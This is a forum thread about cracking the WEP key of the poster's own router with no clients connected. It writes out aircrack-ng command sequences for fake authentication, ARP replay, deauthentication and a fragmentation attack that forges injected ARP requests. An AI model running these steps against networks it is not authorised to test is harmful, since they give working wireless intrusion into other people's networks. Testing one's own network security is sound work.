WEP cracking no client
So I am trying to crack my own WEP key without any clients connected. I have my router up and set up. The problem is that I don't get any arp when I am listening for ARPs. How can I generate traffic? I have read all around the forum and I still don't get an answer whether this can be done. Some people say yes other no, other that you need two laptops (which I have access to if needed). Anyways, this is the commands that I use. The card can inject traffic no problem.
- airodump-ng -w ivs -c 6 ath1
- aireplay-ng -1 30 -e essid -b bssid -h myfakemac ath1 (fake auth because no clients)
- aireplay-ng -3 -e essid -b bssid -h myfakemac ath1 (listening for arps)
Until this point everything ok. I Know that fakeauth does not generate traffic.
Some people seem to think that following is to perform the deauth attac to generate traffic, however this doesn't seem to work. At least not for me. So this is what I do next.
- aireplay-ng -0 15 -b bssid -c myfakemac ath1 (when I do this attack I start getting deauth packets of course, but no traffic or arp is generated)
And i Wait and Wait and Wait and wait!!!. Airodump seem to grab Data packets, but aireplay doens't get any ARPs. Any comments. AM i doing something wrong? Thanks for the reply everybody.
Another thing you may want to try is a Fragmented attack via aireplay. It's a new feature added to aircrack-ng 0.7 suite. Very nice feature I may add. This will create a xor file that can be used with packetforge.
Try something like this after using FakeAuth of course:
aireplay-ng -5 -b <APMAC> -h <YOURMAC> <iface>
This will create the xor file for next step.
packetforge-ng -0 -a <APMAC> -h <YOURMAC> -k 255.255.255.255 -l 255.255.255.255 -y <file.xor> -w arp-request
This creates an ARP request to be used with aireplay:
aireplay-ng -2 -r arp-request <iface>
Works like a charm for me. Actually I think it actually works faster then having to wait for an ARP packet. Hope this helps!
Thanks for your reply. I had gone to aircrach-ng webpage and their updated documentation. They had the fragmentation attack. Which worked really well.
well, thats better than my problem, i create TONS of fast traffic, but it all doesnt mean anything, it's all garbage. i run aircrack and see what key its attempting, and its no where near my key. i cant break my routers key if i set it to be 64(40) bit but 128(104) no way, even with 1.5Million IVs.